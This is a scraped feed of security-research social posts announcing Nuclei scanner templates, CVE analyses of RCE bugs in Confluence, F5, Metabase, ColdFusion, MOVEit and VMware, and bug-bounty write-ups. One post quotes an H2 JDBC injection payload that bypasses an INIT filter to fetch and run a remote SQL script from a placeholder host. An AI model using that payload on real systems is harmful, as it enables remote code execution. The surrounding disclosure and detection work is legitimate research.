I'm thrilled to announce the release of Nuclei Templates v9.8.5!

This latest version includes some fantastic new AWS cloud review templates. Now, both companies and pentesters can use Nuclei to review AWS cloud configurations effectively.

Check it out and let me know what you…

Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k!

blog.projectdiscovery.io/hello-lucee-le…

🚀 Just released our in-depth analysis of CVE-2023-22527, a critical RCE vulnerability in Atlassian Confluence Data Center & Server. 🛡️ Don't miss out on our findings and learn how to detect and protect your systems! 🔍 blog.projectdiscovery.io/atlassian-conf…

#cybersecurity #CVE #RCE …

Hello OgnlGuard/isSafeExpression, we meet again 🤝 🥲 Confluence OGNL Injection.

Given that nuclei has posted a full PoC for CVE-2023-46747, we're sharing the full F5 RCE blog post now. Link is praetorian.com/blog/refresh-c…. Shout outs to Rahul Maini Harsh Jaiswal for getting the PoC in < 72 hours and to OrangeTsai for the inspiration! #f5 #cve202346747 #nuclei

Scan for F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (CVE-2023-46747) using nuclei templates shared by Rahul Maini Harsh Jaiswal

Template - github.com/projectdiscove…

Analysis - praetorian.com/blog/refresh-c… by Praetorian

Advisory - my.f5.com/manage/s/artic……

Here is the blog post for

CVE-2023-22515: Broken Access Control Vulnerability in Confluence Data Center and Server

I've left two challenges in it, try to solve them. If you solve second one, that would be a 0-day 😅

blog.s1r1us.ninja/research/broke…

🎊 ProjectDiscovery Cloud Platform is here! 🎊

Formerly Nuclei Cloud, it's got a new name and is now available for GA!

Head to nux.gg/PDCP_A and read about ProjectDiscovery Cloud Platform!

Template writing, vulnerability scanning, and so much more!

Plenty of ways to RCE, another way to bypass the INIT key block for the h2 engine is using an escape character:

mem:;\INIT=RUNSCRIPT FROM 'htttp://rce/poc.sql'//\;

Great find!

The security research team at Assetnote found and reported a critical pre-auth RCE vulnerability to Metabase earlier this month CVE-2023-38646:

blog.assetnote.io/2023/07/22/pre…

This one was an incredibly fun discovery as there are many roads to RCE through JDBC. We've published details…

⚠ Multiple RCEs, CVEs, and Confusions. Discover the roller coaster ride of vulnerabilities, patch bypasses, and uncover the story behind the temporary take down of our blog! Read now - nux.gg/adobe-coldfusi…
#AdobeColdFusion #CVE -2023-29300 #CVE -2023-38203 #CVE -2023-38204

🔐 What a week in #cybersecurity ! We accidentally published a 0-day, quickly pulled it at Adobe's request, and now, with Adobe's hard work, the issue is finally fixed.

🛠️ We're bringing our blog post back online to share our journey with CVE-2023-29300 and its patches. Curious…

Interestingly JdbcRowSetImpl technique didn't work for us in the latest version of Java. Curious to know if there are some other setter methods that could be called in JDK/Common libraries that can achieve code execution with/without relying on JNDI. Any insights? 🤔

📚 Dive into our new blog analyzing the Adobe ColdFusion Pre-Auth Remote Code Execution vulnerability (CVE-2023-29300).

Visit 👉 blog.projectdiscovery.io/adobe-coldfusi…

Also, check out our nuclei template for effective vulnerability detection.

#AdobeColdFusion #Cybersecurity #CVEanalysis …

I and Rahul Maini reproduced this latest CVE of Moveit (CVE-2023-36934). This is pretty neat finding, props to original finder.

📚 Learn about the MOVEit Transfer SQL Injection vulnerability (CVE-2023-36934) in our latest blog.

Plus, we've also released nuclei template to detect and aid quick mitigation.

blog.projectdiscovery.io/moveit-transfe…

#MOVEit #Cybersecurity #hackwithautomation

🚨 Here is the #Exploit and technical detail for the CVE-2023-20887 Pre-Authenticated Remote Code Execution in #VMWare vRealize Network Insight.
summoning.team/blog/vmware-vr…

Fun one! Wasted a good amount of time because of some encoding issues though.😂

We're launching a new video series, “Nuclei Fundamentals” today!

In the first installment, we'll introduce you to the power of nuclei and nuclei templates. Check it out!

#hackwithautomation #pdteam

youtube.com/watch?v=b5qMyQ…

We are thrilled to announce that Electrovolt is joining forces with the Cure53 to provide a variety of application security services.

Learn More at volt.cure53.de